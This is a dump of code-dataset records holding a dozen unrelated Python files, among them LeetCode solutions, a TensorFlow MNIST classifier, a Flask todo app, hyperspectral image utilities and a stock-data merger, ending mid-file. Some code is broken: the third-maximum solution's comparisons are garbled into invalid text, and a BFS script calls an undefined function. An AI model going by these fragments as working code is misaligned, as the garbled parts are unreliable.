margin_req(balance_df, eqt_shrt_coll_df, eqt_mv_df)\n\n\tconsol_output(margin_df, proj_df, eqt_mv_df, deriv_exp_df, eqt_shrt_coll_df, trd_df, sbl_inv_df, fx_sbl_df)\n\treturn\n\nif __name__ == \"__main__\":\n\tprint (\"PB Cash Data\")\n\ttry:\n\t\t# for dt in list( rrule(DAILY, dtstart=datetime.datetime.strptime(\"20180919\", \"%Y%m%d\"), until=(datetime.datetime.now()+datetime.timedelta(days=-1)), byweekday=(MO,TU,WE,TH,FR)) ):\n\t\t# \tCONST_DIC[\"cur_dt\"] = dt\n\t\tif True:\n\t\t\tmain()\n\texcept KeyboardInterrupt:\n\t\tprint (\"Ctrl+C pressed. Stopping...\")","sub_path":"cash_pb_report/bin/cash_pb_data.py","file_name":"cash_pb_data.py","file_ext":"py","file_size_in_byte":26946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"134217556","text":"\"\"\"\nGiven a non-empty array of integers, return the third maximum number in this array. If it does not exist, return the maximum number. The time complexity must be in O(n).\n\nExample 1:\nInput: [3, 2, 1]\nOutput: 1\nExplanation: The third maximum is 1.\n\nExample 2:\nInput: [1, 2]\nOutput: 2\nExplanation: The third maximum does not exist, so the maximum (2) is returned instead.\n\nExample 3:\nInput: [2, 2, 3, 1]\nOutput: 1\nExplanation: Note that the third maximum here means the third maximum distinct number.\nBoth numbers with value 2 are both considered as second maximum.\n\"\"\"\n\nMIN = -999999999999\n\n\ndef thirdMax(nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n triMax = [MIN, MIN, nums[0]]\n for num in nums[1:]:\n if num>triMax[0] and numtriMax[1] and numtriMax[2]:\n triMax[0] = triMax[1]\n triMax[1] = triMax[2]\n triMax[2] = num\n \n if triMax[0]==MIN:\n return triMax[2]\n else:\n return triMax[0]\n \n\n\nif __name__ == '__main__':\n print('Thirdmax: [3,2,1] -> {}'.format(thirdMax([3,2,1])))\n print('Thirdmax: [1,2] -> {}'.format(thirdMax([1,2])))\n print('Thirdmax: [2,2,3,1] -> {}'.format(thirdMax([2,2,3,1])))","sub_path":"LeetCode/414_third-maximum-number.py","file_name":"414_third-maximum-number.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"109964330","text":"\nfrom main.football.Consumer import *\nfrom main.football.FlushConsumer import *\nfrom main.lib.metchMeta import *\nfrom main.football.Producer import *\nimport datetime\n\n\ndef main():\n threadNum = 300\n fp = open(\"data/user_id_message.txt\", \"r\")\n fout = open(\"data/result_message-{0}.txt\".format(datetime.datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S-%f\")), \"w\")\n resultList = []\n\n meta = getMatchMeta(\"owriLtzawu-1cVgzOYpfQSK_Hkq8\")\n\n print(\"===============猜球===========\")\n print(\"球赛总共 : {0} 场\".format(len(meta)))\n\n for i in range(len(meta)):\n choose = input(\"第 {0} 场: {1}(A), {2}(B), pint(C) : \".format(i, meta[i]['teamA']['name'], meta[i]['teamB']['name']))\n resItem = {}\n resItem['teamId'] = str(meta[i]['teamId'])\n if choose == \"A\":\n resItem['voteCountryId'] = meta[i]['teamA']['countryId']\n elif choose == \"B\":\n resItem['voteCountryId'] = meta[i]['teamB']['countryId']\n elif choose == \"C\":\n resItem['voteCountryId'] = 'ping'\n else:\n print(\"Your input error : [{0}], you should input [A , B , C]\".format(choose))\n return\n resultList.append(resItem)\n print(\"=====================================\")\n print(\"start: {0} ... \".format(datetime.datetime.now()))\n\n idQueue = Queue()\n resQueue = Queue()\n consumeNum = 0\n\n\n producter = Producer(idQueue, fp)\n lock = threading.Lock()\n\n idConsumerList = []\n\n for index in range(threadNum) :\n idConsumerList.append(Consumer(resultList, idQueue, resQueue, consumeNum, lock))\n\n flushConsumer = FlushConsumer(resQueue, consumeNum, lock, fout)\n\n\n producter.start()\n for index in range(threadNum):\n idConsumerList[index].start()\n flushConsumer.start()\n\n producter.join()\n for index in range(threadNum):\n idConsumerList[index].join()\n flushConsumer.join()\n\n\n\n print(\"finish: {0}\".format(datetime.datetime.now()))\n\n\nif __name__ == '__main__':\n main()","sub_path":"python/7-python-project/match-estimate/main/football/match-main.py","file_name":"match-main.py","file_ext":"py","file_size_in_byte":2005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"549709187","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Sep 6 14:28:17 2019\n\n@author: Arthur\n\n\"Interface\" for training broccoli model\n\nRequired input:\n -Path of train directory\n -Path of model directory (to save or load model)\n -Version and type of model\n -Feature extraction options (colour space and index) when training new model\n 'colour space: Lab, colour index: NDI' is a good choice\n -Epochs (10 epochs is fine)\n -Dimension of images for training: 'input_size' x 'input_size'\n For 10m height 64 is good, 30m 32 or less would be better\n -Batch size for training in batches\n -Settings:\n >Use AUGMENT_DATA to indicate whether to augment data (recommended)\n >Use TRAIN_FURTHER to indicate whether to further train a model or train new model\n When further training model 'name', a new model is saved named 'name+'\n\"\"\"\n\n#-----------------------------------------------------------------------------#\nimport sys\nsys.path.insert(1, r\"C:\\Users\\Arthur\\Documents\\Study\\Internship VanBoven\\Finished code\\Model broccoli\\Modules\")\n\nimport train_model as tm\n\n#-----------------------------------Paths-------------------------------------#\n# Data and model directory (if path to folder put '\\\\' at the end)\ntrain_dir = r\"C:\\Users\\Arthur\\Documents\\Study\\Internship VanBoven\\Data\\Project - Identifying Broccoli Heads\\Train\\\\\"\nmodel_dir = r\"C:\\Users\\Arthur\\Documents\\Study\\Internship VanBoven\\Project - Identifying Broccoli Heads\\Models\\\\\"\n\n#-----------------------------Feature extraction------------------------------#\nFE = {}\nFE['colour_space'] = ['Lab']\nFE['colour_index'] = ['NDI']\n\n#---------------------------------Settings------------------------------------#\nmodel_version = 201\nmodel_type = 'VGG16'\n\nepochs = 10\ninput_size = 64\nbatch_size = 32\n\nAUGMENT_DATA = True\nTRAIN_FURTHER = False\n\ntm.TrainModel(train_dir, FE, \n epochs, input_size, batch_size,\n model_version, model_type, model_dir,\n AUGMENT_DATA, TRAIN_FURTHER)","sub_path":"Model broccoli/TrainModel.py","file_name":"TrainModel.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"394234943","text":"# visits all the nodes of a graph (connected component) using BFS\nimport sys\nfrom importlib import util\nfrom timeit import default_timer as timer\n\n# Load the model\nif len(sys.argv) <2:\n\tprint(\"Error: No model specified.\")\n\tquit()\nprint(\"Loading model from \\\"{0}\\\"...\".format(sys.argv[1]), end = \"\", flush = True)\nspec = util.spec_from_file_location(\"model\", sys.argv[1])\nmodel = util.module_from_spec(spec)\nspec.loader.exec_module(model)\nnetwork = model.Network() # create network instance\nprint(\" done.\")\n# Print some information about the model and the initial state\nstart_time = timer()\nstart=network.get_initial_state()\nprint(\"The destination node of this transition is \", start)\n#for checking state space\nminCostProperties = [] #Keep a list of all minimal cost properties\nexistProperties = [] #Keep a list of all minimal exist properties\npropertiesFound = [False] * len(network.properties) # Keeps track of which properties have already been found\n\n# Sort properties based on kind\nprint(\"* The model has\", len(network.properties), \"properties.\")\ncounter = 0\nfor property in network.properties:\n if (property.exp is not None and property.exp.op == \"exists\" and property.exp.args[0].op == \"eventually\" and\n property.exp.args[0].args[0].op == \"ap\"):\n existProperties.append(counter) # We might have to use atomic proposition instead of index\n else:\n minCostProperties.append(property.exp.args[1].args[0])\n\n counter = counter + 1\n\n\ndef bfs_connected_component(graph, start):\n # keep track of all visited nodes\n explored = []\n # keep track of nodes to be checked\n queue = [start]\n # keep looping until there are nodes still to be checked\n while queue:\n # pop shallowest node (first node) from queue\n node = queue.pop(0)\n if node not in explored:\n # add node to list of checked nodes\n explored.append(node)\n print(len(explored))\n transitions = network.get_transitions(node)\n # print(\"The transition taken is: \", )\n #print (network.transition_labels[explored[0].label])\n for trans in transitions:\n next_state = network.jump_np(node, trans)\n print(\"The destination node of this transition is \", next_state)\n print(\"The index is \", network.transition_labels)\n queue.append(next_state)\n\n # Check if any exist properties hold.\n for i in existProperties:\n if (network.get_expression_value(node, i)) == True and propertiesFound[i] == False:\n print(\"\\n\\nWe have found a trace where the property holds\")\n propertiesFound[i] = True\n source = node\n traceList = []\n while (source!= network.get_initial_state()):\n traceList.append(source)\n traceList.reverse()\n for item in traceList:\n print(str(item), end=', ')\n print(\"The amount of notes visited was:\", len(explored))\n\n return explored\n\n\n#for checking properties\n\nbfs_connected_component(network,start)\nbfs_properties()\n\n\n\n\n\n\n","sub_path":"5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":3169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"371274495","text":"''' author: samtenka\n changed: 2017-10-08\n created: 2017-10-07\n credits: www.tensorflow.org/get_started/mnist/pros\n descr: convolutional classifier on MNIST \n usage: Run `python convolutional.py`.\n'''\n\nimport tensorflow as tf\nimport numpy as np\n\n###############################################################################\n# 0. LIST PROGRAM PARAMETERS #\n###############################################################################\n\n# 0.0. (Hyper)Parameters of Stochastic Gradient Descent. (Notice the smaller\n# learning rate):\nTRAIN_TIME = 1000\nBATCH_SIZE= 100\nLEARNING_RATE = 0.01\n\n###############################################################################\n# 1. READ DATASET #\n###############################################################################\n\n# 0.0. MNIST is a classic image-classification dataset. Its images are 28x28 \n# grayscale photographs of handwritten digits (0 through 9). Note that\n# we load the labels in one-hot form. This makes defining a loss function\n# easier: \nfrom tensorflow.examples.tutorials.mnist import input_data\nmnist = input_data.read_data_sets('MNIST_data', one_hot=True)\n\ndef get_batch(size=BATCH_SIZE):\n ''' Return `inputs` of shape (28*28,) and the corresponding\n `outputs` of shape (10,)\n randomly sampled from the full data. \n '''\n inputs, outputs = mnist.train.next_batch(size)\n return inputs, outputs\n\n###############################################################################\n# 2. BUILD COMPUTATION GRAPH #\n###############################################################################\n\n# 2.0. Placeholders for the data to which to fit the model:\nTrueInputs = tf.placeholder(tf.float32, shape=[None, 28*28])\nTrueOutputs= tf.placeholder(tf.float32, shape=[None, 10])\n\n# 2.1. MODEL HYPERPARAMETERS:\nLearningRate = tf.placeholder(dtype=tf.float32)\nKeepProb = tf.placeholder(tf.float32)\n\n# 2.1. MODEL PARAMETERS (note the choice of initialization):\nWeightsA= tf.get_variable('Wa', shape=[5, 5, 1, 32], dtype=tf.float32, initializer=tf.contrib.layers.xavier_initializer_conv2d())\nBiasesA = tf.get_variable('Ba', shape=[ 32], dtype=tf.float32, initializer=tf.truncated_normal_initializer())\nWeightsB= tf.get_variable('Wb', shape=[3, 3, 32, 64], dtype=tf.float32, initializer=tf.contrib.layers.xavier_initializer_conv2d())\nBiasesB = tf.get_variable('Bb', shape=[ 64], dtype=tf.float32, initializer=tf.truncated_normal_initializer())\n\nWeightsC= tf.get_variable('Wc', shape=[5*5*64, 512], dtype=tf.float32, initializer=tf.contrib.layers.xavier_initializer())\nBiasesC = tf.get_variable('Bc', shape=[ 512], dtype=tf.float32, initializer=tf.truncated_normal_initializer())\nWeightsD= tf.get_variable('Wd', shape=[ 512, 10], dtype=tf.float32, initializer=tf.contrib.layers.xavier_initializer())\nBiasesD = tf.get_variable('Bd', shape=[ 10], dtype=tf.float32, initializer=tf.truncated_normal_initializer())\n\n# 2.2. BUILD CLASSIFIER:\ndef conv2d(x, W, stride=2, padding='VALID'):\n ''' Linear convolutional map '''\n return tf.nn.conv2d(x, W, strides=[1, stride, stride, 1], padding=padding)\n\ndef lrelu(x):\n ''' leaky ReLU activation function '''\n return tf.maximum(0.1*x, x)\n\nInputImages = tf.reshape(TrueInputs, [-1, 28, 28, 1])\nHiddenLayerA = lrelu(conv2d(InputImages, WeightsA) + BiasesA) # 12 x 12 x 32\nHiddenLayerB = lrelu(conv2d(HiddenLayerA, WeightsB) + BiasesB) # 5 x 5 x 64\n\nHiddenLayerC = lrelu(tf.matmul(tf.reshape(HiddenLayerB, [-1, 5*5*64]), WeightsC) + BiasesC)\nDropped = tf.nn.dropout(HiddenLayerC, KeepProb)\nPredictedOutputLogits = tf.matmul(Dropped, WeightsD) + BiasesD\n\n# 2.3. Gradient Descent acts to minimize a differentiable loss (here Cross Entropy):\nCrossEntropyLoss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=TrueOutputs, logits=PredictedOutputLogits))\n\n# 2.4. GRADIENT DESCENT STEP (note the change to ADAM):\nUpdate = tf.train.AdamOptimizer(LearningRate).minimize(CrossEntropyLoss)\n\n# 2.5. Classification Diagnostics (how well did we do?). Note the nice use of\n# `reduce_mean`. \nPredictionIsCorrect = tf.equal(tf.argmax(PredictedOutputLogits, 1), tf.argmax(TrueOutputs, 1))\nAccuracy = tf.reduce_mean(tf.cast(PredictionIsCorrect, tf.float32))\n\n###############################################################################\n# 3. RUN GRAPH #\n###############################################################################\n\nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n \n # 3.0. Train the model...\n for i in range(TRAIN_TIME):\n batch_inputs, batch_outputs = get_batch() \n sess.run(Update, feed_dict={TrueInputs:batch_inputs, TrueOutputs:batch_outputs, LearningRate:LEARNING_RATE, KeepProb:0.5}) \n\n if i%50: continue\n batch_inputs, batch_outputs = get_batch() \n # Note that at test time, KeepProb becomes 1...\n train_accuracy = sess.run(Accuracy, feed_dict={TrueInputs:batch_inputs, TrueOutputs:batch_outputs, KeepProb:1.0})\n print('step %d, training accuracy %g' % (i, train_accuracy))\n\n # 3.1. Report the final model's accuracy:\n accuracy = sess.run(Accuracy, feed_dict={TrueInputs: mnist.test.images, TrueOutputs: mnist.test.labels, KeepProb:1.0})\n print('Final accuracy: %.3f' % accuracy)\n","sub_path":"PartA/convolutional.py","file_name":"convolutional.py","file_ext":"py","file_size_in_byte":5536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"582995358","text":"# imports\n\nimport os\nimport shutil\nimport string\nimport time # used to measure execution time\nfrom multiprocessing import Pool\n\nimport pandas as pd\n\ntrainingset_folder = \"D:/data_mt/09_training/\"\nstock_data_folder = trainingset_folder + \"stocks/\"\ncombine_data_folder = trainingset_folder + \"combined/\"\n\noverwrite = True\n\ndef create_dir_structure(startfolder: str):\n if not os.path.exists(startfolder):\n os.makedirs(startfolder)\n\n for char in string.ascii_uppercase:\n folder = startfolder + char + \"/\"\n directory = os.path.dirname(folder)\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n\ndef load_additional_info() -> pd.DataFrame:\n return pd.read_csv(trainingset_folder + \"company_info.csv\", sep=',', encoding='utf-8', header=0)\n\n\ndef load_reports():\n df = pd.read_csv(trainingset_folder + \"company_reports.csv\", header=0)\n df.period = pd.to_datetime(df.period)\n df.filed = pd.to_datetime(df.filed)\n return df\n\n\ndef load_stock_history(ticker: str):\n df = pd.read_csv(stock_data_folder + ticker[0] + \"/\" + ticker + \".csv\")\n df.Date = pd.to_datetime(df.Date)\n return df\n\n\ndef merge_dataframes(ticker, ticker_fd_data):\n ticker_stock_data = load_stock_history(ticker)\n ticker_stock_data = ticker_stock_data[ticker_stock_data.Date > \"2012-01-01\"]\n ticker_stock_data['i_date'] = ticker_stock_data.Date\n ticker_stock_data.set_index('i_date', inplace=True)\n\n ticker_fd_data['i_date'] = ticker_fd_data.filed\n ticker_fd_data.set_index('i_date', inplace=True)\n\n combined_data = pd.merge(ticker_fd_data, ticker_stock_data, left_index=True, right_index=True, how='outer')\n combined_data.sort_index(inplace=True)\n\n combined_data = combined_data.fillna(method=\"ffill\")\n combined_data = combined_data.dropna(subset=['filed', 'Date'])\n\n combined_data['ticker'] = combined_data.ticker_x\n combined_data.drop(columns=['ticker_x', 'ticker_y'])\n\n return combined_data\n\n\ndef create_price_ratio_features(combined_data, shares_outstanding):\n combined_data['pr_p2e'] = combined_data.Close * shares_outstanding / (\n combined_data.c_NetIncomeLoss - combined_data.c_PaymentsOfDividendsTotal)\n combined_data['pr_p2b'] = combined_data.Close * shares_outstanding / (\n combined_data.Assets - combined_data.Liabilities)\n combined_data['pr_p2egr_1y'] = combined_data.pr_p2e / (\n combined_data.gr_netincome_p * 100) # approximated / denominator in percent\n\n # caping p2e: in order to prevent meaningless values, we need to restrict the range. The max value is limited to 100.\n # if new_df.c_NetIncomeLoss - new_df.c_PaymentsOfDividendsTotal results in a negativ value, we set p2e to 100, which is rather a \"bad\" value.\n combined_data.loc[(combined_data.pr_p2e < 0) | (combined_data.pr_p2e > 100), 'pr_p2e'] = 100\n\n # caping p2egr: the lower the better. generally you would like to see a ratio lower than 1, so a 5 can be considered a really bad value so we restrict it to 5\n # if growth number is 0 or less, we set p2egr to 5\n combined_data.loc[(combined_data.pr_p2egr_1y > 5) | (combined_data.pr_p2egr_1y <= 0.0), 'pr_p2egr_1y'] = 5\n\n\ndef find_10_day_max(date, close, df):\n date_low = date + pd.DateOffset(days=180)\n date_high = date + pd.DateOffset(days=360)\n\n # return df[(df.Date >= date_low) & ((df.Date <= date_high))].Close.max()\n close_list = df[(df.Date >= date_low) & (df.Date <= date_high)].Close.sort_values(ascending=False).to_list()\n if len(close_list) >= 10:\n return close_list[9]\n return 0\n\n\ndef calculate_potential(combined_data):\n combined_data['c_max_10day'] = combined_data.apply(lambda row : find_10_day_max(row['Date'], row['Close'], combined_data), axis = 1)\n combined_data['r_potential'] = (combined_data.c_max_10day / combined_data.Close) - 1\n\n\ndef process_ticker(data_tuple):\n try:\n ticker = data_tuple[0]\n ticker_fd_data = data_tuple[1]\n ticker_add_info = data_tuple[2]\n\n new_file = combine_data_folder + ticker[0] + \"/\" + ticker + \".csv\"\n\n print('process: ', ticker, end=\"\")\n if os.path.isfile(new_file) & (overwrite is False):\n print(\" skip\")\n return\n\n print(\"...\")\n\n shares_outstanding = ticker_add_info.sharesOutstanding.to_list()[0]\n\n combined_data = merge_dataframes(ticker, ticker_fd_data)\n create_price_ratio_features(combined_data, shares_outstanding)\n calculate_potential(combined_data)\n\n combined_data.to_csv(new_file, sep=',', encoding='utf-8', index=False)\n except Exception as e:\n print(e)\n\n \ndef data_generator():\n add_info = load_additional_info()\n fd_data = load_reports()\n tickers = add_info.ticker.unique()\n print(len(tickers))\n\n for ticker in tickers:\n ticker_fd_data = fd_data[fd_data.ticker == ticker].copy()\n ticker_add_info = add_info[add_info.ticker == ticker]\n\n yield ticker, ticker_fd_data, ticker_add_info\n\n\nif __name__ == '__main__':\n if overwrite:\n shutil.rmtree(combine_data_folder,ignore_errors = True)\n\n create_dir_structure(combine_data_folder)\n\n start = time.time()\n # serial\n # for data_tuple in data_generator():\n # process_ticker(data_tuple)\n\n\n #parallel\n # needs about 30 minutes...\n pool = Pool(8)\n pool.map(process_ticker, data_generator())\n pool.close()\n pool.join()\n\n print(\"duration: \", time.time() - start)\n\n","sub_path":"99_01_combine_finance_stock_data.py","file_name":"99_01_combine_finance_stock_data.py","file_ext":"py","file_size_in_byte":5480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"107679117","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nFileName: hsiUtilities\nAuthor Name: Arun M Saranathan\nDescription: This file includes implementation of specific utility functions which are used for CRISM data\n processing\nDate Created: 19th February 2019\nLast Modified: 03rd September 2019\n\"\"\"\nimport numpy as np\nfrom scipy import interpolate\nimport spectral.io.envi as envi\nfrom scipy import ndimage\n\nfrom generalUtilities import generalUtilities\n\nclass hsiUtilities():\n def hsiSpatialSmoothing(self, crImgName, filtersize=5):\n \"\"\"\n This function can be used to perform a spatial smoothing on an Hyperspectral image and save it.\n\n :param crImgName: the name of the file we want to smooth\n :param filtersize: the filter size\n :return: the name of the saved smoothed image\n \"\"\"\n crHdrName = crImgName.replace('.img', '.hdr')\n header = envi.read_envi_header(crHdrName)\n 'Read in the background image'\n crImg = envi.open(crHdrName, crImgName)\n crCube = crImg.load()\n [rows, cols, bands] = crCube.shape\n t1 = crImgName.rfind('/')\n temp = crImgName[(t1+1):]\n if ((temp.find('FRT') != -1) or (temp.find('FRS') != -1)):\n strtCol = 29\n stopCol = -7\n else:\n if ((temp.find('HRL') != -1) or (temp.find('HRS') != -1)):\n strtCol = 15\n stopCol = -4\n\n crCube = crCube[:, strtCol:stopCol, 4:244]\n\n 'Initialize matrix to nans'\n crCube_smoothed = np.empty((rows, cols, bands), dtype=float)\n crCube_smoothed[:] = np.nan\n\n for ii in range(240):\n bandImg = np.squeeze(crCube[:, :, ii])\n bandImg_smooth = ndimage.uniform_filter(bandImg, size=filtersize)\n crCube_smoothed[:, strtCol:stopCol, ii + 4] = bandImg_smooth\n\n outFileName = crImgName.replace('.img', ('_smoothed' + str(filtersize) + '.hdr'))\n envi.save_image(outFileName, crCube_smoothed, dtype=np.float32, force=True,\n interleave='bil', metadata=header)\n\n return outFileName\n\n def scaleSpectra(self, data, scaleMin=0.02):\n \"\"\"\n This function scales every row so that it has the same minimum value.\n\n :param data: A numpy matrix where the rows are individual spectra.\n :param scaleMin: 1 - The smallest value that the spectra should have (default = 0.02)\n :return: scaled matrix\n \"\"\"\n\n 'First subtract 1 and set everything at 1 to 0'\n data_shft = data - 1\n 'divide by the minimum in each row'\n data_min = data_shft.min(axis=1)\n\n data_scale = np.zeros(data.shape)\n\n 'Scale each endmember and create plots to see what it looks like'\n for ii in range(data.shape[0]):\n temp = data_shft[ii, :] / data_min[ii]\n data_scale[ii, :] = temp * -1 * scaleMin\n\n return (data_scale + 1)\n\n def hsiFlip(self, imgName):\n \"\"\"\n This function can be used to flip the image upside down. This is often required in the case of CRISM images as\n the data is the pds is arranged in the reverse order\n\n :param imgName: The address of the image to be flipped\n ----------------------------------------------------------------------------------------------------------------\n OUTPUT\n ----------------------------------------------------------------------------------------------------------------\n :return: outFileName: The name of the file with the convex background\n \"\"\"\n\n imgHdrName = imgName.replace(\".img\", \".hdr\")\n 'Now load the image'\n img = envi.open(imgHdrName, imgName)\n header = envi.read_envi_header(imgHdrName)\n cube = img.load()\n [_, _, bands] = img.shape\n\n 'Get the wavelength information'\n wvl = header['wavelength']\n wvl = np.asarray(wvl, dtype=np.float32)\n\n 'Flip the image and the wavelengths'\n cube_flip = np.flip(cube, axis=2)\n wvl = np.flip(wvl, axis=0)\n header['wavelength'] = wvl\n\n if header['default bands']:\n defaultBands = np.asarray(header['default bands'], dtype=np.int)\n defaultBands = bands - defaultBands\n header['default bands'] = defaultBands\n\n 'Save the flipped data'\n outFileName = imgName.replace(\".img\", \"_flip.hdr\")\n envi.save_image(outFileName, cube_flip, dtype='single', force=True, interleave='bil', metadata=header)\n\n return outFileName\n\n def hsiNan_fill(self, imgHdrName):\n \"\"\"\n This function can be used to fill in the nans based on the other data in the image.\n\n :param imgHdrName: location of the HDR file associated with the envi image of choice\n :return:\n \"\"\"\n imgName = imgHdrName.replace('.hdr', '.img')\n header = envi.read_envi_header(imgHdrName)\n 'Read in the background image'\n crImg = envi.open(imgHdrName, imgName)\n crCube = crImg.load()\n [rows, cols, bands] = crCube.shape\n\n arrCrImg = crCube.reshape((rows * cols, bands))\n 'Fill the NaNs in the columns'\n arrCrImg = generalUtilities().fill_nan(arrCrImg)\n 'Fill the NaNs in the rows'\n arrCrImgCrop = arrCrImg[:, 4:244]\n arrCrImgCrop = generalUtilities().fill_nan(arrCrImgCrop.T)\n arrCrImg[:, 4:244] = arrCrImgCrop.T\n 'Reshape to image size'\n crCube_nr = arrCrImg.reshape((rows, cols, bands))\n\n 'Save the background image'\n outFileName1 = imgName.replace('.img', '_CRnR.hdr')\n envi.save_image(outFileName1, crCube_nr, dtype='single',\n force=True, interleave='bil', metadata=header)\n\n return outFileName1\n\n \"\"\"\n def hsiImgSmooth(self, imgHdrName, strtCol=0, stopCol=0):\n '''\n\n :param imgHdrName:\n :return:\n '''\n imgName = imgHdrName.replace('.hdr', '.img')\n header = envi.read_envi_header(imgHdrName)\n\n 'Read in the background image'\n crImg = envi.open(imgHdrName, imgName)\n crCube = crImg.load()\n\n crCube = crCube[:, strtCol:stopCol, 4:244]\n\n 'Initialize matrix to nans'\n crCube_smoothed = np.empty((rows, cols, bands), dtype=float)\n crCube_smoothed[:] = np.nan\n\n for ii in range(240):\n bandImg = np.squeeze(crCube[:, :, ii])\n bandImg_smooth = ndimage.uniform_filter(bandImg, size=5)\n crCube_smoothed[:, strtCol:stopCol, ii + 4] = bandImg_smooth\n\n outFileName = crImgName.replace('_MS_CRnR.img', '_MS_smoothed5_CR.hdr')\n envi.save_image(outFileName, crCube_smoothed, dtype=np.float32, force=True,\n interleave='bil', metadata=header)\n \"\"\"\n\n","sub_path":"hsiUtilities/hsiUtilities.py","file_name":"hsiUtilities.py","file_ext":"py","file_size_in_byte":6822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"88357668","text":"import torch\nimport torchvision\nimport torchvision.transforms as transforms\nfrom augmentation import *\nimport matplotlib.pyplot as plt\n\ndata_folder = \"../data\"\n\n\ntransform = transforms.Compose(\n [transforms.ToTensor(),\n transforms.Normalize((0, 0, 0), (1, 1, 1))])\n\ntrain_set = torchvision.datasets.MNIST(root=data_folder, train=True,\n download=False, transform=transform)\n\ntrain_loader = torch.utils.data.DataLoader(train_set, batch_size=1,\n shuffle=True, num_workers=0)\n\n\niterTrainLoader = iter(train_loader)\ninput1, _ = next(iterTrainLoader)\ninput1Aug = random_augmentation(input1)\nprint(input1.shape)\nprint(input1Aug.shape)\n\nf, imgplot = plt.subplots(1,2)\nimgplot[0].imshow(torch.squeeze(input1), cmap='gray')\nimgplot[1].imshow(torch.squeeze(input1Aug), cmap='gray')\nplt.show()\n","sub_path":"LearnDistance/fix_one/testAugmentations.py","file_name":"testAugmentations.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"441294671","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nfrom flask import Flask, render_template, url_for, request, redirect\nfrom pymongo import MongoClient\nfrom redis import Redis\n\nr = Redis(host='redis', port=6379)\napp = Flask(__name__)\n\nm = MongoClient('mongo', 27017)\ndb = m.tododb\n\n@app.route('/')\ndef todo():\n _items = db.tododb.find()\n items = [item for item in _items]\n return render_template('todo.html', items=items)\n\n\n@app.route('/new', methods=['POST'])\ndef new():\n item_doc = {\n 'name': request.form['name'],\n 'description': request.form['description']\n }\n db.tododb.insert_one(item_doc)\n return redirect(url_for('todo'))\n\n\n@app.route('/redis')\ndef hello():\n r.incr('hits')\n return 'I have been seen %s times' % r.get('hits')\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', debug=True)\n","sub_path":"flask_compose/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"116335293","text":"class UnionFind:\n def __init__(self, n: int):\n self.count = n\n self.id = list(range(n))\n self.rank = [0] * n\n\n def unionByRank(self, u: int, v: int) -> None:\n i = self._find(u)\n j = self._find(v)\n if i == j:\n return\n if self.rank[i] < self.rank[j]:\n self.id[i] = j\n elif self.rank[i] > self.rank[j]:\n self.id[j] = i\n else:\n self.id[i] = j\n self.rank[j] += 1\n self.count -= 1\n\n def _find(self, u: int) -> int:\n if self.id[u] != u:\n self.id[u] = self._find(self.id[u])\n return self.id[u]\n\n\nclass Solution:\n def countComponents(self, n: int, edges: List[List[int]]) -> int:\n uf = UnionFind(n)\n\n for u, v in edges:\n uf.unionByRank(u, v)\n\n return uf.count\n","sub_path":"solutions/0323. Number of Connected Components in an Undirected Graph/0323-3.py","file_name":"0323-3.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"388438103","text":"\"\"\"Transcribe a given audio file.\"\"\"\n\nimport os\n\nimport tensorflow as tf\n\nfrom python.params import FLAGS, TF_FLOAT, BASE_PATH\nfrom python.load_sample import load_sample, NUM_FEATURES\n# WarpCTC crashes during evaluation. Even if it's only imported and not actually being used.\nif FLAGS.use_warp_ctc:\n FLAGS.use_warp_ctc = False\n import python.model as model\nelse:\n import python.model as model\n\n\n# File to transcribe.\n# WAV_PATHS = ['../datasets/speech_data/timit/TIMIT/TRAIN/DR4/FALR0/SA1.WAV']\nWAV_PATHS = [os.path.join(BASE_PATH, '../datasets/myaudiocorpus/idontunderstandawordyoujustsaid.wav')]\n\n\ndef transcribe_once(logits_op, decoded_op, plaintext_op, feed_dict):\n \"\"\"Restore model from latest checkpoint and run the inference for the provided `sequence`.\n\n Args:\n logits_op (tf.Tensor):\n Logits operator.\n decoded_op (tf.Tensor):\n Decoded operator.\n plaintext_op (tf.Tensor):\n Plaintext operator.\n feed_dict (dict):\n Session run feed dictionary.\n\n Returns:\n Nothing.\n \"\"\"\n # Session configuration.\n session_config = tf.ConfigProto(\n log_device_placement=False,\n gpu_options=tf.GPUOptions(allow_growth=True)\n )\n\n with tf.Session(config=session_config) as sess:\n checkpoint = tf.train.get_checkpoint_state(FLAGS.train_dir)\n if checkpoint and checkpoint.model_checkpoint_path:\n saver = tf.train.Saver()\n\n # Restore from checkpoint.\n saver.restore(sess, checkpoint.model_checkpoint_path)\n # Extract global stop from checkpoint.\n global_step = checkpoint.model_checkpoint_path.split('/')[-1].split('-')[-1]\n global_step = str(global_step)\n print('Loaded global step: {}, from checkpoint: {}'\n .format(global_step, FLAGS.train_dir))\n else:\n print('No checkpoint file found.')\n return\n\n # Start the queue runners.\n coord = 